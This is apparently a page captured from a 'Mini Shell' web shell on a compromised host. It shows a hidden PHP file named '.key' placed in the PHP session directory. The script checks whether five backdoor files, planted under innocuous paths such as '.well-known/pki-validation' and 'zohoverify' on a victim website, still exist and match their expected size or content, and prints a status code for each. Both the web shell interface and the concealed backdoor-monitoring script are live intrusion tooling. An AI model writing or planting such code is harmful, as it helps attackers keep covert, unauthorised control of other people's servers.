Mini Shell

Direktori : /opt/alt/php81/var/lib/php/session/
Upload File :
Current File : //opt/alt/php81/var/lib/php/session/.key

<?php   $r = '/home/ukubnwwt/airlev8.com'; $x = ["/comingsoon_files/record_artists.php"=>"bd@@210265@@581",
"/.well-known/pki-validation/sched_ranking.php"=>"bd@@210273@@599",
"/rester/index.php"=>"bd@@204411@@reverse_lookup",
"/.well-known/gallery.php"=>"bd@@207555@@1500",
"/zohoverify/glsl.php"=>"bd@@209376@@614"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');